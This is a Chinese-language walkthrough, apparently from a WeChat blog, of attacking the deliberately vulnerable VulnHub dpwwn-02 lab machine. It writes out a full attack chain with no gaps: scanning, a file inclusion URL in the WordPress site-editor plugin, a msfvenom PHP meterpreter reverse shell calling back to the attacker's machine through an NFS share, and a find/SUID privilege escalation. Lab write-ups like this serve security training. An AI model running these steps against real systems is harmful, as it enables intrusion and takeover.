本周末实践的是vulnhub的dpwwn-02镜像,这个镜像稍微复杂一些,
下载地址,https://download.vulnhub.com/dpwwn/dpwwn-02.zip,
解压后一看就是vmware的虚机,当然就用workstation打开,
启动靶机,从console上没有看到ip地址,还是得自己去扫,但是没扫到,
注意到镜像网站上的说明,镜像的地址被写死成10.10.10.10了,
就把本地kali攻击机也改成跟靶机同一个网络,就能通了,直接端口扫描,
sudo nmap -sS -sV -T5 -A -p- 10.10.10.10,
发现有web服务,接着来个目录爆破,sudo dirb http://10.10.10.10,
看到是wordpress,就再来个针对性的扫描,
sudo wpscan --url http://10.10.10.10/wordpress -e p,
看到有个插件site-editor,对其进行漏洞利用搜索,
searchsploit site editor 1.1.1,
看到一个文件包含漏洞,查看详细说明,
cat /usr/share/exploitdb/exploits/php/webapps/44340.txt,
知道了漏洞利用的url,先尝试http://10.10.10.10/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd,发现不对,改成http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd,就对了,
记得之前端口扫描的结果里有nfs服务,首先查看共享路径,
showmount --exports 10.10.10.10,
创建本地目录,mkdir dpwwn02,
把靶机的共享路径mount到本地目录,
sudo mount -t nfs 10.10.10.10:/home/dpwwn02 --target dpwwn02,
本地创建一个反弹shell脚本,
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 R > shell.php,
复制到共享路径mount的目录,sudo cp shell.php dpwwn02/,
本地再开一个监听,
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.10.10.128
exploit
用浏览器访问http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/home/dpwwn02/shell.php,
反弹shell就过来了,发现不是root,需要提权,
find / -perm -u=s -type f 2>/dev/null,又有find,哈哈,
给bash命令加账户权限,find /home -exec chmod u+s /bin/bash ;
再执行bash命令,就拿到root权限了。
本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之dpwwn-02的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论